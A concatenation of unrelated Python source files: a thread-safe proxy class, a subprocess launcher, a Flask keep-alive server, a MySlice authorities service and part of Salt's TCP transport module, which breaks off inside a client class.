self.safe.set()
def isMethod(self, fn):
return inspect.ismethod(fn)
# Everything from this point on is just a series of thread-safing proxy
# methods that make calls against _ref and threadsafe whenever data will be
# written to or if a method will be called. SafeMembrane instances should
# be unwrapped whenever passing them into the thread
#use type() to determine if an object is a SafeMembrane while debugging
def __repr__(self):
return self._ref.__repr__()
def __call__(self, *args, **kw):
self.safeIn()
args = list(map(unwrap, args))
for k in list(kw.keys()):
kw[k] = unwrap(kw[k])
r = self._ref(*args, **kw)
self.safeOut()
if r is not None:
return SafeMembrane(r)
def __getattribute__(self, attr, oga=object.__getattribute__):
if attr.startswith('__') or attr == '_ref':
subject = oga(self, '_ref')
if attr == '_ref':
return subject
return getattr(subject, attr)
return oga(self, attr)
def __getattr__(self, attr, oga=object.__getattribute__):
r = getattr(oga(self, '_ref'), attr)
return SafeMembrane(r)
def __setattr__(self, attr, val, osa=object.__setattr__):
if (attr == '_ref'
or hasattr(type(self), attr) and not attr.startswith('__')):
osa(self, attr, val)
else:
self.safeIn()
val = unwrap(val)
setattr(self._ref, attr, val)
self.safeOut()
def __delattr__(self, attr, oda=object.__delattr__):
self.safeIn()
delattr(self._ref, attr)
self.safeOut()
def __bool__(self):
return bool(self._ref)
def __getitem__(self, arg):
return SafeMembrane(self._ref[arg])
def __setitem__(self, arg, val):
self.safeIn()
val = unwrap(val)
self._ref[arg] = val
self.safeOut()
def __delitem__(self, arg):
self.safeIn()
del self._ref[arg]
self.safeOut()
def __getslice__(self, i, j):
return SafeMembrane(self._ref[i:j])
def __setslice__(self, i, j, val):
self.safeIn()
val = unwrap(val)
self._ref[i:j] = val
self.safeOut()
def __delslice__(self, i, j):
self.safeIn()
del self._ref[i:j]
self.safeOut()
def __enter__(self, *args, **kwargs):
self.safeIn()
self._ref.__enter__(*args, **kwargs)
def __exit__(self, *args, **kwargs):
self._ref.__exit__(*args, **kwargs)
self.safeOut()
class InteractiveLauncher(SafeMembrane):
'''
Proxy to an application instance that launches it in a thread and
then returns and acts as a proxy to the application in the thread.
'''
__slots__ = ('_ref', 'safe', 'confirmed', 'thread', 'app')
@deprecated
def __init__(self, app=None, *args, **kwargs):
if app is None:
app = App()
EventLoop.safe = Event()
self.safe = EventLoop.safe
self.safe.set()
EventLoop.confirmed = Event()
self.confirmed = EventLoop.confirmed
self.app = app
def startApp(app=app, *args, **kwargs):
app.run(*args, **kwargs)
self.thread = Thread(target=startApp, *args, **kwargs)
def run(self):
self.thread.start()
#Proxy behavior starts after this is set. Before this point, attaching
#widgets etc can only be done through the Launcher's app attribute
self._ref = self.app
def stop(self):
EventLoop.quit = True
self.thread.join()
#Act like the app instance even before _ref is set
def __repr__(self):
return self.app.__repr__()
|
start_software.py | import os
from subprocess import call, STDOUT
from threading import Thread
FNULL = open(os.devnull, 'w')
def start_software(*args):
thread = Thread(target=call, args=args, kwargs={'stdout': FNULL, 'stderr': STDOUT})
thread.start()
|
keep_alive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello, what are you doing here? Anyway congrats, you found the secret webpage :D"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
authorities.py | #
# MySlice version 2
#
# Authorities service: manages authority scope events
#
# (c) 2016 Ciro Scognamiglio <ciro.scognamiglio@lip6.fr>, Loïc Baron <loic.baron@lip6.fr>
##
import pprint
import signal
import threading
from queue import Queue
from myslice.db.activity import Event, ObjectType
import rethinkdb as r
from myslice.db import connect, changes, events
from myslice.services.workers.authorities import events_run as manageAuthoritiesEvents
from myslice.services.workers.authorities import sync as syncAuthorities
import myslice.lib.log as logging
from myslice import config
import zmq
import pickle
logger = logging.getLogger()
def receive_signal(signum, stack):
logger.info('Received signal %s', signum)
raise SystemExit('Exiting')
def run():
"""
"""
signal.signal(signal.SIGINT, receive_signal)
signal.signal(signal.SIGTERM, receive_signal)
signal.signal(signal.SIGHUP, receive_signal)
# db connection is shared between threads
qAuthorityEvents = Queue()
lock = threading.Lock()
threads = []
for y in range(1):
t = threading.Thread(target=manageAuthoritiesEvents, args=(lock, qAuthorityEvents))
t.daemon = True
threads.append(t)
t.start()
if config.services['authorities']['sync']:
for y in range(1):
t = threading.Thread(target=syncAuthorities, args=(lock, ))
t.daemon = True
threads.append(t)
t.start()
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.setsockopt_string(zmq.SUBSCRIBE, 'authorities')
socket.connect("tcp://localhost:6002")
logger.info("[authorities] Collecting updates from ZMQ bus for activity")
while True:
logger.debug("[authorities]Change in authorities feed")
topic, zmqmessage = socket.recv_multipart()
activity = pickle.loads(zmqmessage)
logger.debug("[authorities]{0}: {1}".format(topic, activity))
try:
event = Event(activity['new_val'])
logger.debug("[authorities] Add event %s to %s queue" % (event.id, event.object.type))
qAuthorityEvents.put(event)
except Exception as e:
import traceback
traceback.print_exc()
logger.exception(e)
if 'new_val' in activity and 'id' in activity['new_val']:
logger.error("[authorities] Problem with event: {}".format(activity['new_val']['id']))
else:
logger.error("[authorities] Event is malformed: {}".format(activity))
continue
logger.critical("[authorities] Service authorities stopped")
for x in threads:
x.join()
|
tcp.py | # -*- coding: utf-8 -*-
'''
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import logging
import os
import socket
import sys
import time
import threading
import traceback
import weakref
# Import Salt Libs
import salt.crypt
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.payload
import salt.exceptions
import salt.transport.frame
import salt.transport.ipc
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.ext.six.moves import queue # pylint: disable=import-error
from salt.exceptions import SaltReqTimeoutError, SaltClientError
from salt.transport import iter_transport_opts
# Import Tornado Libs
import tornado
import tornado.tcpserver
import tornado.gen
import tornado.concurrent
import tornado.tcpclient
import tornado.netutil
import tornado.iostream
# pylint: disable=import-error,no-name-in-module
if six.PY2:
import urlparse
else:
import urllib.parse as urlparse
# pylint: enable=import-error,no-name-in-module
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if six.PY3 and salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
'''
Ensure that TCP keepalives are set for the socket.
'''
if hasattr(socket, 'SO_KEEPALIVE'):
if opts.get('tcp_keepalive', False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, 'SOL_TCP'):
if hasattr(socket, 'TCP_KEEPIDLE'):
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE,
int(tcp_keepalive_idle))
if hasattr(socket, 'TCP_KEEPCNT'):
tcp_keepalive_cnt = opts.get('tcp_keepalive_cnt', -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT,
int(tcp_keepalive_cnt))
if hasattr(socket, 'TCP_KEEPINTVL'):
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl))
if hasattr(socket, 'SIO_KEEPALIVE_VALS'):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
1, int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000)))
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingProcess):
'''
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
'''
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super(LoadBalancerServer, self).__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on
# Windows.
def __setstate__(self, state):
self.__init__(
state['opts'],
state['socket_queue'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'socket_queue': self.socket_queue,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def run(self):
'''
Start the load balancer
'''
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except socket.error as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if tornado.util.errno_from_exception(e) == errno.ECONNABORTED:
continue
raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to tcp.
Note: this class returns a singleton
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncTCPReqChannel for %s', key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug('Re-using AsyncTCPReqChannel for %s', key)
return obj
@classmethod
def __key(cls, opts, **kwargs):
if 'master_uri' in kwargs:
opts['master_uri'] = kwargs['master_uri']
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
opts['master_uri'],
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get('resolver')
parse = urlparse.urlparse(self.opts['master_uri'])
master_host, master_port = parse.netloc.rsplit(':', 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(self.opts,
args=(self.opts, master_host, int(master_port),),
kwargs={'io_loop': self.io_loop, 'resolver': resolver,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_ret_port')})
def close(self):
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
'This is not the last %s instance. Not closing yet.',
self.__class__.__name__
)
return
log.debug('Closing %s instance', self.__class__.__name__)
self._closing = True
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self.io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self.io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self.io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except socket.error as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret['key'], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
'''
@tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
try:
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError('Connection to master lost')
raise tornado.gen.Return(ret)
class AsyncTCPPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.event = salt.utils.event.get_event(
'minion',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def send_id(self, tok, force_auth):
'''
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
'''
load = {'id': self.opts['id'], 'tok': tok}
@tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while count <= self.opts['tcp_authentication_retries'] or self.opts['tcp_authentication_retries'] < 0:
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event(
{'master': self.opts['master']},
'__master_connected'
)
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get('__role') == 'syndic':
data = 'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'syndic'
)
else:
data = 'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'minion'
)
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': None,
'tok': self.tok,
'data': data,
'tag': tag}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel, (self.opts,)
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
finally:
# SyncWrapper will call either close() or destroy(), whichever is available
del req_channel
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event(
{'master': self.opts['master']},
'__master_disconnected'
)
@tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b'salt')
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts['master_ip'], int(self.auth.creds['publish_port']),),
kwargs={'io_loop': self.io_loop,
'connect_callback': self.connect_callback,
'disconnect_callback': self.disconnect_callback,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_publish_port')})
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt:
raise
except Exception as exc:
if '-|RETRY|-' not in six.text_type(exc):
raise SaltClientError('Unable to sign_in to master: {0}'.format(exc)) # TODO: better error message
def on_recv(self, callback):
'''
Register an on_recv callback
'''
if callback is None:
return self.message_client.on_recv(callback)
@tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = salt.utils.msgpack.loads(body)
if six.PY3:
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
six.reraise(*sys.exc_info())
self._socket.close()
self._socket = None
if hasattr(self.req_server, 'shutdown'):
try:
self.req_server.shutdown()
except Exception as exc:
log.exception('TCPReqServerChannel close generated an exception: %s', str(exc))
elif hasattr(self.req_server, 'stop'):
try:
self.req_server.stop()
except socket.error as exc:
if exc.errno != 9:
raise
log.exception('TCPReqServerChannel close generated an exception: %s', str(exc))
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(self.socket_queue,
self.handle_message,
ssl_options=self.opts.get('ssl'))
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self.req_server = SaltMessageServer(self.handle_message,
ssl_options=self.opts.get('ssl'),
io_loop=self.io_loop)
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
@tornado.gen.coroutine
def handle_message(self, stream, header, payload):
'''
Handle incoming messages from underylying tcp streams
'''
try:
try:
payload = self._decode_payload(payload)
except Exception:
stream.write(salt.transport.frame.frame_msg('bad load', header=header))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
yield stream.write(salt.transport.frame.frame_msg(
'payload and load must be a dict', header=header))
raise tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if str('\0') in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
yield stream.write(salt.transport.frame.frame_msg(
self._auth(payload['load']), header=header))
raise tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.write('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
stream.close()
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == 'send':
stream.write(salt.transport.frame.frame_msg(self.crypticle.dumps(ret), header=header))
elif req_fun == 'send_private':
stream.write(salt.transport.frame.frame_msg(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
), header=header))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.write('Server-side exception handling payload')
stream.close()
except tornado.gen.Return:
raise
except tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error('Connection was unexpectedly closed', exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error('Unexpected exception occurred: %s', exc, exc_info=True)
raise tornado.gen.Return()
class SaltMessageServer(tornado.tcpserver.TCPServer, object):
'''
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
'''
def __init__(self, message_handler, *args, **kwargs):
io_loop = kwargs.pop('io_loop', None) or tornado.ioloop.IOLoop.current()
super(SaltMessageServer, self).__init__(*args, **kwargs)
self.io_loop = io_loop
self.clients = []
self.message_handler = message_handler
self._shutting_down = False
@tornado.gen.coroutine
def handle_stream(self, stream, address):
'''
Handle incoming streams and add messages to the incoming queue
'''
log.trace('Req client %s connected', address)
self.clients.append((stream, address))
unpacker = salt.utils.msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
self.io_loop.spawn_callback(self.message_handler, stream, header, framed_msg['body'])
except tornado.iostream.StreamClosedError:
log.trace('req client disconnected %s', address)
self.remove_client((stream, address))
except Exception as e:
log.trace('other master-side exception: %s', e)
self.remove_client((stream, address))
stream.close()
def remove_client(self, client):
try:
self.clients.remove(client)
except ValueError:
log.trace("Message server client was not in list to remove")
def shutdown(self):
'''
Shutdown the whole server
'''
if self._shutting_down:
return
self._shutting_down = True
for item in self.clients:
client, address = item
client.close()
self.remove_client(item)
try:
self.stop()
except socket.error as exc:
if exc.errno != 9:
raise
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
'''
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
'''
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super(LoadBalancerWorker, self).__init__(
message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
self._stop.set()
self.thread.join()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(tornado.tcpclient.TCPClient):
'''
Override _create_stream() in TCPClient to enable keep alive support.
'''
def __init__(self, opts, resolver=None):
self.opts = opts
super(TCPClientKeepAlive, self).__init__(resolver=resolver)
def _create_stream(self, max_buffer_size, af, addr, **kwargs): # pylint: disable=unused-argument
'''
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
'''
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = tornado.iostream.IOStream(
sock,
max_buffer_size=max_buffer_size)
if tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(SaltMessageClientPool, self).__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
for future in futures:
yield future
raise tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient(object):
'''
Low-level message sending client
'''
def __init__(self, opts, host, port, io_loop=None, resolver=None,
connect_callback=None, disconnect_callback=None,
source_ip=None, source_port=None):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = tornado.concurrent.Future()
